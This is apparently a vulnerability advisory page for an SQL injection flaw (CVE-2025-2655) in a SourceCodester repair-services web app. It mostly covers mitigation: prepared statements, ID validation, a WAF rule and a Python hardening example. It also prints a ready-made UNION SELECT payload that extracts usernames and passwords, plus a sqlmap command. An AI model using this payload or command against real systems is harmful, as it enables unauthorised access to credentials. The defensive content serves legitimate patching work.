The CVE-2025-2655 vulnerability in SourceCodester AC Repair and Services System 1.0 allows remote attackers to execute arbitrary SQL queries via the `ID` parameter in the `save_users` function within /classes/Users.php. This occurs due to improper input sanitization, enabling malicious actors to manipulate database operations. The flaw is exploitable without authentication, making it critical. Attackers can extract, modify, or delete sensitive data, including admin credentials. The vulnerability stems from direct concatenation of user-supplied input into SQL statements instead of using prepared statements or parameterized queries. Public exploit scripts leverage this weakness by injecting crafted payloads into the `ID` field, triggering unauthorized database access.
DailyCVE Form
Platform: SourceCodester
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/13/2025
What Undercode Say:
Exploitation:
1. Craft a malicious HTTP POST request to /classes/Users.php:
   POST /classes/Users.php HTTP/1.1
   Host: target.com
   Content-Type: application/x-www-form-urlencoded

   action=save_users&ID=1' UNION SELECT 1,username,password,4 FROM users--
2. Use automated tools like `sqlmap`:
   sqlmap -u "http://target.com/classes/Users.php?action=save_users&ID=1" --risk=3 --level=5
Mitigation:
1. Patch the `save_users` function with prepared statements:
   $stmt = $conn->prepare("UPDATE users SET username=?, email=? WHERE id=?");
   $stmt->bind_param("ssi", $_POST['username'], $_POST['email'], $_POST['ID']);
   $stmt->execute(); // bound values travel separately from the SQL text, so they cannot alter the query structure
2. Implement input validation (defense in depth; the prepared statement in step 1 is the primary fix):
   if (!is_numeric($_POST['ID'])) { die("Invalid ID"); }
3. Apply WAF rules to block SQLi patterns (ModSecurity v3 with the nginx connector; `modsecurity on;` and the escaped `\.` in the location regex are needed for the rule to apply to PHP requests):
   location ~ \.php$ {
       modsecurity on;
       modsecurity_rules 'SecRule ARGS "@detectSQLi" "id:1000,phase:2,deny,status:403"';
   }
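The two mitigation layers above (a strict ID check and a parameterized UPDATE), as an added Python example against an in-memory SQLite table; this is not the application's code, and the schema, column names and the `save_users_*` handler signatures are assumptions. The validation step is stricter than the `is_numeric` check in step 2, since a record id should only ever be a plain positive integer.

```python
import re
import sqlite3

# Constructed sample schema and rows; the application's real table layout is not known here.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, email TEXT);
INSERT INTO users VALUES (1, 'admin', 'admin-password-hash', 'admin@example.test');
INSERT INTO users VALUES (2, 'alice', 'alice-password-hash', 'alice@example.test');
"""
# The payload quoted in the advisory, used here only as test input for the hardened handlers.
UNION_PAYLOAD = "1' UNION SELECT 1,username,password,4 FROM users--"

def fresh_db():
    """In-memory SQLite database loaded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def validate_id(raw):
    """Strict ID check: a positive decimal integer and nothing else. Stricter than
    PHP's is_numeric(), which also admits '1e3', '1.5' and leading whitespace."""
    if not isinstance(raw, str) or not re.fullmatch(r"[1-9][0-9]*", raw):
        raise ValueError("Invalid ID")
    return int(raw)

def save_users_unsafe_sql(post):
    """The concatenation pattern the advisory describes, returned as text and never
    executed: the user-controlled ID becomes part of the statement's structure."""
    return ("UPDATE users SET username='%s', email='%s' WHERE id='%s'"
            % (post["username"], post["email"], post["ID"]))

def save_users_parameterized(conn, post):
    """Step 1 alone: a bound ID is compared as a plain value, so the payload is a
    literal that matches no row and no other statement is ever run."""
    cur = conn.execute("UPDATE users SET username=?, email=? WHERE id=?",
                       (post["username"], post["email"], post["ID"]))
    conn.commit()
    return cur.rowcount  # number of rows actually changed

def save_users_hardened(conn, post):
    """Steps 1 and 2 together: reject malformed IDs up front, then bind the integer."""
    user_id = validate_id(post["ID"])
    cur = conn.execute("UPDATE users SET username=?, email=? WHERE id=?",
                       (post["username"], post["email"], user_id))
    conn.commit()
    return cur.rowcount
```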
Analytics:
- Attack Vector: Remote, unauthenticated
- Impact: Data exfiltration, system compromise
- CVSS 4.0: AV:N/AC:L/PR:N/UI:N/VC:L/VI:L/VA:L
- Exploit Availability: Public
Detection:
grep -r "save_users.ID" /var/www/html/classes/
References:
Reported By: nvd.nist.gov
Source: Undercode